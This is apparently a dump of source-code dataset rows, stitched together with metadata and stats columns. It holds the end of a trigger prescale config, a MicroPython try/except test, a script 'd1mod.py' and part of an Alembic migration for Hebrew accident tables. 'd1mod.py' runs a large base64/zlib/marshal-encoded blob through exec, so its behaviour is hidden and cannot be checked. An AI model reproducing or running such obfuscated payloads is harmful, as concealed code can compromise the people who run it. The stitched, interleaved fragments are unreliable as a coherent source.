1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
5000,
1,
1,
1,
1,
1,
1,
1,
1,
1
)
))
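# Each vint32 entry prescales the L1 algorithm trigger bit with the same
# index: a factor N keeps roughly 1 in N events that fire that bit, so 1
# means unprescaled and the large factors tame high-rate triggers.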
| 11.716312 | 81 | 0.264528 | 149 | 1,652 | 2.926175 | 0.174497 | 0.362385 | 0.447248 | 0.477064 | 0.380734 | 0.327982 | 0.261468 | 0.201835 | 0.201835 | 0.130734 | 0 | 0.428571 | 0.648305 | 1,652 | 140 | 82 | 11.8 | 0.321859 | 0 | 0 | 0.925373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.014925 | 0 | 0.014925 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
10344c8ae30d4b78b36856ae8d2f91789ce3f592 | 179 | py | Python | tests/bytecode/mp-tests/try1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/try1.py | roger-/micropython | bad2df3e95cd5719099319d71590a79bf6bc4493 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/try1.py | roger-/micropython | bad2df3e95cd5719099319d71590a79bf6bc4493 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | def f(x):
try:
f(x)
except:
f(x)
try:
f(x)
except Exception:
f(x)
try:
f(x)
except Exception as e:
f(x, e)
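# Exercises the three except-clause forms the bytecode emitter must handle:
# bare except, typed except, and typed except with a bound name.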
| 12.785714 | 26 | 0.368715 | 26 | 179 | 2.538462 | 0.307692 | 0.212121 | 0.227273 | 0.272727 | 0.863636 | 0.863636 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.50838 | 179 | 13 | 27 | 13.769231 | 0.75 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.076923 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
10beae83ef54e81eda8589dec3cd355a71abf0b2 | 3,408 | py | Python | d1mod.py | mrxD1MOD/reserveIPlockup-x2 | 3b76af641159641719199faa28bfdb2e48a56c3e | [
"MIT"
] | null | null | null | d1mod.py | mrxD1MOD/reserveIPlockup-x2 | 3b76af641159641719199faa28bfdb2e48a56c3e | [
"MIT"
] | null | null | null | d1mod.py | mrxD1MOD/reserveIPlockup-x2 | 3b76af641159641719199faa28bfdb2e48a56c3e | [
"MIT"
] | null | null | null | #ENCRYPT BY D1MOD1877
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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"))))
| 852 | 3,358 | 0.963028 | 114 | 3,408 | 28.789474 | 0.973684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164903 | 0.001761 | 3,408 | 3 | 3,359 | 1,136 | 0.799824 | 0.005869 | 0 | 0 | 0 | 0.5 | 0.974314 | 0.974314 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
5e1f0bc193f2746539b767c1169265e6e6c73ed3 | 43,776 | py | Python | alembic/versions/2a849701bd03_remove_cbs_views_create_tables.py | shaysw/anyway | 35dec531fd4ac79c99d09e684027df017e989ddc | [
"MIT"
] | 69 | 2015-03-30T17:09:46.000Z | 2021-08-15T16:45:47.000Z | alembic/versions/2a849701bd03_remove_cbs_views_create_tables.py | shaysw/anyway | 35dec531fd4ac79c99d09e684027df017e989ddc | [
"MIT"
] | 1,368 | 2015-01-12T16:33:52.000Z | 2022-03-31T21:10:18.000Z | alembic/versions/2a849701bd03_remove_cbs_views_create_tables.py | shaysw/anyway | 35dec531fd4ac79c99d09e684027df017e989ddc | [
"MIT"
] | 277 | 2015-02-16T17:52:06.000Z | 2022-02-16T18:06:44.000Z | """remove cbs views create tables
Revision ID: 2a849701bd03
Revises: 262d7c789220
Create Date: 2020-11-13 20:25:05.729735
"""
# revision identifiers, used by Alembic.
revision = '2a849701bd03'
down_revision = '262d7c789220'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
import geoalchemy2
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute("DROP VIEW IF EXISTS involved_markers_hebrew")
op.execute("DROP VIEW IF EXISTS vehicles_markers_hebrew")
op.execute("DROP VIEW IF EXISTS markers_hebrew")
op.execute("DROP VIEW IF EXISTS involved_hebrew")
op.execute("DROP VIEW IF EXISTS vehicles_hebrew")
op.create_table('involved_hebrew',
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('involved_type', sa.Integer(), nullable=True),
sa.Column('involved_type_hebrew', sa.Text(), nullable=True),
sa.Column('license_acquiring_date', sa.Integer(), nullable=True),
sa.Column('age_group', sa.Integer(), nullable=True),
sa.Column('age_group_hebrew', sa.Text(), nullable=True),
sa.Column('sex', sa.Integer(), nullable=True),
sa.Column('sex_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures', sa.Integer(), nullable=True),
sa.Column('safety_measures_hebrew', sa.Text(), nullable=True),
sa.Column('involve_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('involve_yishuv_name', sa.Text(), nullable=True),
sa.Column('injury_severity', sa.Integer(), nullable=True),
sa.Column('injury_severity_hebrew', sa.Text(), nullable=True),
sa.Column('injured_type', sa.Integer(), nullable=True),
sa.Column('injured_type_hebrew', sa.Text(), nullable=True),
sa.Column('injured_position', sa.Integer(), nullable=True),
sa.Column('injured_position_hebrew', sa.Text(), nullable=True),
sa.Column('population_type', sa.Integer(), nullable=True),
sa.Column('population_type_hebrew', sa.Text(), nullable=True),
sa.Column('home_region', sa.Integer(), nullable=True),
sa.Column('home_region_hebrew', sa.Text(), nullable=True),
sa.Column('home_district', sa.Integer(), nullable=True),
sa.Column('home_district_hebrew', sa.Text(), nullable=True),
sa.Column('home_natural_area', sa.Integer(), nullable=True),
sa.Column('home_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('home_municipal_status', sa.Integer(), nullable=True),
sa.Column('home_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('home_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('home_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('hospital_time', sa.Integer(), nullable=True),
sa.Column('hospital_time_hebrew', sa.Text(), nullable=True),
sa.Column('medical_type', sa.Integer(), nullable=True),
sa.Column('medical_type_hebrew', sa.Text(), nullable=True),
sa.Column('release_dest', sa.Integer(), nullable=True),
sa.Column('release_dest_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures_use', sa.Integer(), nullable=True),
sa.Column('safety_measures_use_hebrew', sa.Text(), nullable=True),
sa.Column('late_deceased', sa.Integer(), nullable=True),
sa.Column('late_deceased_hebrew', sa.Text(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.Column('involve_id', sa.Integer(), nullable=False),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('accident_id', 'provider_code', 'involve_id', 'accident_year')
)
op.create_index(op.f('ix_involved_hebrew_accident_year'), 'involved_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_involved_hebrew_involved_type'), 'involved_hebrew', ['involved_type'], unique=False)
op.create_index(op.f('ix_involved_hebrew_involved_type_hebrew'), 'involved_hebrew', ['involved_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_hebrew_vehicle_type'), 'involved_hebrew', ['vehicle_type'], unique=False)
op.create_index(op.f('ix_involved_hebrew_vehicle_type_hebrew'), 'involved_hebrew', ['vehicle_type_hebrew'], unique=False)
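# involved_markers_hebrew: involved-person fields denormalized together with the
# accident (marker) attributes, including the PostGIS point geometry.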
op.create_table('involved_markers_hebrew',
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('involved_type', sa.Integer(), nullable=True),
sa.Column('involved_type_hebrew', sa.Text(), nullable=True),
sa.Column('license_acquiring_date', sa.Integer(), nullable=True),
sa.Column('age_group', sa.Integer(), nullable=True),
sa.Column('age_group_hebrew', sa.Text(), nullable=True),
sa.Column('sex', sa.Integer(), nullable=True),
sa.Column('sex_hebrew', sa.Text(), nullable=True),
sa.Column('involve_vehicle_type', sa.Integer(), nullable=True),
sa.Column('involve_vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures', sa.Integer(), nullable=True),
sa.Column('safety_measures_hebrew', sa.Text(), nullable=True),
sa.Column('involve_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('involve_yishuv_name', sa.Text(), nullable=True),
sa.Column('injury_severity', sa.Integer(), nullable=True),
sa.Column('injury_severity_hebrew', sa.Text(), nullable=True),
sa.Column('injured_type', sa.Integer(), nullable=True),
sa.Column('injured_type_hebrew', sa.Text(), nullable=True),
sa.Column('injured_position', sa.Integer(), nullable=True),
sa.Column('injured_position_hebrew', sa.Text(), nullable=True),
sa.Column('population_type', sa.Integer(), nullable=True),
sa.Column('population_type_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_region', sa.Integer(), nullable=True),
sa.Column('involve_home_region_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_district', sa.Integer(), nullable=True),
sa.Column('involve_home_district_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_natural_area', sa.Integer(), nullable=True),
sa.Column('involve_home_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_municipal_status', sa.Integer(), nullable=True),
sa.Column('involve_home_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('involve_home_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('hospital_time', sa.Integer(), nullable=True),
sa.Column('hospital_time_hebrew', sa.Text(), nullable=True),
sa.Column('medical_type', sa.Integer(), nullable=True),
sa.Column('medical_type_hebrew', sa.Text(), nullable=True),
sa.Column('release_dest', sa.Integer(), nullable=True),
sa.Column('release_dest_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures_use', sa.Integer(), nullable=True),
sa.Column('safety_measures_use_hebrew', sa.Text(), nullable=True),
sa.Column('late_deceased', sa.Integer(), nullable=True),
sa.Column('late_deceased_hebrew', sa.Text(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.Column('involve_id', sa.Integer(), nullable=False),
sa.Column('accident_year', sa.Integer(), nullable=True),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.Column('provider_code_hebrew', sa.Text(), nullable=True),
sa.Column('accident_timestamp', sa.DateTime(), nullable=True),
sa.Column('accident_type', sa.Integer(), nullable=True),
sa.Column('accident_type_hebrew', sa.Text(), nullable=True),
sa.Column('accident_severity', sa.Integer(), nullable=True),
sa.Column('accident_severity_hebrew', sa.Text(), nullable=True),
sa.Column('location_accuracy', sa.Integer(), nullable=True),
sa.Column('location_accuracy_hebrew', sa.Text(), nullable=True),
sa.Column('road_type', sa.Integer(), nullable=True),
sa.Column('road_type_hebrew', sa.Text(), nullable=True),
sa.Column('road_shape', sa.Integer(), nullable=True),
sa.Column('road_shape_hebrew', sa.Text(), nullable=True),
sa.Column('day_type', sa.Integer(), nullable=True),
sa.Column('day_type_hebrew', sa.Text(), nullable=True),
sa.Column('police_unit', sa.Integer(), nullable=True),
sa.Column('police_unit_hebrew', sa.Text(), nullable=True),
sa.Column('one_lane', sa.Integer(), nullable=True),
sa.Column('one_lane_hebrew', sa.Text(), nullable=True),
sa.Column('multi_lane', sa.Integer(), nullable=True),
sa.Column('multi_lane_hebrew', sa.Text(), nullable=True),
sa.Column('speed_limit', sa.Integer(), nullable=True),
sa.Column('speed_limit_hebrew', sa.Text(), nullable=True),
sa.Column('road_intactness', sa.Integer(), nullable=True),
sa.Column('road_intactness_hebrew', sa.Text(), nullable=True),
sa.Column('road_width', sa.Integer(), nullable=True),
sa.Column('road_width_hebrew', sa.Text(), nullable=True),
sa.Column('road_sign', sa.Integer(), nullable=True),
sa.Column('road_sign_hebrew', sa.Text(), nullable=True),
sa.Column('road_light', sa.Integer(), nullable=True),
sa.Column('road_light_hebrew', sa.Text(), nullable=True),
sa.Column('road_control', sa.Integer(), nullable=True),
sa.Column('road_control_hebrew', sa.Text(), nullable=True),
sa.Column('weather', sa.Integer(), nullable=True),
sa.Column('weather_hebrew', sa.Text(), nullable=True),
sa.Column('road_surface', sa.Integer(), nullable=True),
sa.Column('road_surface_hebrew', sa.Text(), nullable=True),
sa.Column('road_object', sa.Integer(), nullable=True),
sa.Column('road_object_hebrew', sa.Text(), nullable=True),
sa.Column('object_distance', sa.Integer(), nullable=True),
sa.Column('object_distance_hebrew', sa.Text(), nullable=True),
sa.Column('didnt_cross', sa.Integer(), nullable=True),
sa.Column('didnt_cross_hebrew', sa.Text(), nullable=True),
sa.Column('cross_mode', sa.Integer(), nullable=True),
sa.Column('cross_mode_hebrew', sa.Text(), nullable=True),
sa.Column('cross_location', sa.Integer(), nullable=True),
sa.Column('cross_location_hebrew', sa.Text(), nullable=True),
sa.Column('cross_direction', sa.Integer(), nullable=True),
sa.Column('cross_direction_hebrew', sa.Text(), nullable=True),
sa.Column('road1', sa.Integer(), nullable=True),
sa.Column('road2', sa.Integer(), nullable=True),
sa.Column('km', sa.Float(), nullable=True),
sa.Column('km_raw', sa.Text(), nullable=True),
sa.Column('km_accurate', sa.Boolean(), nullable=True),
sa.Column('road_segment_id', sa.Integer(), nullable=True),
sa.Column('road_segment_number', sa.Integer(), nullable=True),
sa.Column('road_segment_name', sa.Text(), nullable=True),
sa.Column('road_segment_from_km', sa.Float(), nullable=True),
sa.Column('road_segment_to_km', sa.Float(), nullable=True),
sa.Column('road_segment_length_km', sa.Float(), nullable=True),
sa.Column('accident_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_name', sa.Text(), nullable=True),
sa.Column('geo_area', sa.Integer(), nullable=True),
sa.Column('geo_area_hebrew', sa.Text(), nullable=True),
sa.Column('day_night', sa.Integer(), nullable=True),
sa.Column('day_night_hebrew', sa.Text(), nullable=True),
sa.Column('day_in_week', sa.Integer(), nullable=True),
sa.Column('day_in_week_hebrew', sa.Text(), nullable=True),
sa.Column('traffic_light', sa.Integer(), nullable=True),
sa.Column('traffic_light_hebrew', sa.Text(), nullable=True),
sa.Column('accident_region', sa.Integer(), nullable=True),
sa.Column('accident_region_hebrew', sa.Text(), nullable=True),
sa.Column('accident_district', sa.Integer(), nullable=True),
sa.Column('accident_district_hebrew', sa.Text(), nullable=True),
sa.Column('accident_natural_area', sa.Integer(), nullable=True),
sa.Column('accident_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('accident_municipal_status', sa.Integer(), nullable=True),
sa.Column('accident_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('accident_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('street1', sa.Integer(), nullable=True),
sa.Column('street1_hebrew', sa.Text(), nullable=True),
sa.Column('street2', sa.Integer(), nullable=True),
sa.Column('street2_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection_by_junction_number', sa.Text(), nullable=True),
sa.Column('accident_day', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw_hebrew', sa.Text(), nullable=True),
sa.Column('accident_hour', sa.Integer(), nullable=True),
sa.Column('accident_minute', sa.Integer(), nullable=True),
sa.Column('geom', geoalchemy2.types.Geometry(geometry_type='POINT', from_text='ST_GeomFromEWKT', name='geometry'), nullable=True),
sa.Column('longitude', sa.Float(), nullable=True),
sa.Column('latitude', sa.Float(), nullable=True),
sa.Column('x', sa.Float(), nullable=True),
sa.Column('y', sa.Float(), nullable=True),
sa.Column('engine_volume', sa.Integer(), nullable=True),
sa.Column('engine_volume_hebrew', sa.Text(), nullable=True),
sa.Column('manufacturing_year', sa.Integer(), nullable=True),
sa.Column('driving_directions', sa.Integer(), nullable=True),
sa.Column('driving_directions_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_status', sa.Integer(), nullable=True),
sa.Column('vehicle_status_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_attribution', sa.Integer(), nullable=True),
sa.Column('vehicle_attribution_hebrew', sa.Text(), nullable=True),
sa.Column('seats', sa.Integer(), nullable=True),
sa.Column('total_weight', sa.Integer(), nullable=True),
sa.Column('total_weight_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_damage', sa.Integer(), nullable=True),
sa.Column('vehicle_damage_hebrew', sa.Text(), nullable=True),
sa.PrimaryKeyConstraint('accident_id', 'provider_code', 'involve_id', 'accident_year')
)
op.create_index(op.f('ix_involved_markers_hebrew_accident_severity'), 'involved_markers_hebrew', ['accident_severity'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_severity_hebrew'), 'involved_markers_hebrew', ['accident_severity_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_timestamp'), 'involved_markers_hebrew', ['accident_timestamp'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_year'), 'involved_markers_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_yishuv_name'), 'involved_markers_hebrew', ['accident_yishuv_name'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_geom'), 'involved_markers_hebrew', ['geom'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type'), 'involved_markers_hebrew', ['involve_vehicle_type'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type_hebrew'), 'involved_markers_hebrew', ['involve_vehicle_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involved_type'), 'involved_markers_hebrew', ['involved_type'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involved_type_hebrew'), 'involved_markers_hebrew', ['involved_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road1'), 'involved_markers_hebrew', ['road1'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road2'), 'involved_markers_hebrew', ['road2'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_segment_id'), 'involved_markers_hebrew', ['road_segment_id'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_segment_name'), 'involved_markers_hebrew', ['road_segment_name'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_segment_number'), 'involved_markers_hebrew', ['road_segment_number'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_type'), 'involved_markers_hebrew', ['road_type'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_type_hebrew'), 'involved_markers_hebrew', ['road_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_street1_hebrew'), 'involved_markers_hebrew', ['street1_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_street2_hebrew'), 'involved_markers_hebrew', ['street2_hebrew'], unique=False)
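# markers_hebrew: accident-level records, keyed by (id, provider_code, accident_year).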
op.create_table('markers_hebrew',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('provider_code_hebrew', sa.Text(), nullable=True),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('accident_type', sa.Integer(), nullable=True),
sa.Column('accident_type_hebrew', sa.Text(), nullable=True),
sa.Column('accident_severity', sa.Integer(), nullable=True),
sa.Column('accident_severity_hebrew', sa.Text(), nullable=True),
sa.Column('accident_timestamp', sa.DateTime(), nullable=True),
sa.Column('location_accuracy', sa.Integer(), nullable=True),
sa.Column('location_accuracy_hebrew', sa.Text(), nullable=True),
sa.Column('road_type', sa.Integer(), nullable=True),
sa.Column('road_type_hebrew', sa.Text(), nullable=True),
sa.Column('road_shape', sa.Integer(), nullable=True),
sa.Column('road_shape_hebrew', sa.Text(), nullable=True),
sa.Column('day_type', sa.Integer(), nullable=True),
sa.Column('day_type_hebrew', sa.Text(), nullable=True),
sa.Column('police_unit', sa.Integer(), nullable=True),
sa.Column('police_unit_hebrew', sa.Text(), nullable=True),
sa.Column('one_lane', sa.Integer(), nullable=True),
sa.Column('one_lane_hebrew', sa.Text(), nullable=True),
sa.Column('multi_lane', sa.Integer(), nullable=True),
sa.Column('multi_lane_hebrew', sa.Text(), nullable=True),
sa.Column('speed_limit', sa.Integer(), nullable=True),
sa.Column('speed_limit_hebrew', sa.Text(), nullable=True),
sa.Column('road_intactness', sa.Integer(), nullable=True),
sa.Column('road_intactness_hebrew', sa.Text(), nullable=True),
sa.Column('road_width', sa.Integer(), nullable=True),
sa.Column('road_width_hebrew', sa.Text(), nullable=True),
sa.Column('road_sign', sa.Integer(), nullable=True),
sa.Column('road_sign_hebrew', sa.Text(), nullable=True),
sa.Column('road_light', sa.Integer(), nullable=True),
sa.Column('road_light_hebrew', sa.Text(), nullable=True),
sa.Column('road_control', sa.Integer(), nullable=True),
sa.Column('road_control_hebrew', sa.Text(), nullable=True),
sa.Column('weather', sa.Integer(), nullable=True),
sa.Column('weather_hebrew', sa.Text(), nullable=True),
sa.Column('road_surface', sa.Integer(), nullable=True),
sa.Column('road_surface_hebrew', sa.Text(), nullable=True),
sa.Column('road_object', sa.Integer(), nullable=True),
sa.Column('road_object_hebrew', sa.Text(), nullable=True),
sa.Column('object_distance', sa.Integer(), nullable=True),
sa.Column('object_distance_hebrew', sa.Text(), nullable=True),
sa.Column('didnt_cross', sa.Integer(), nullable=True),
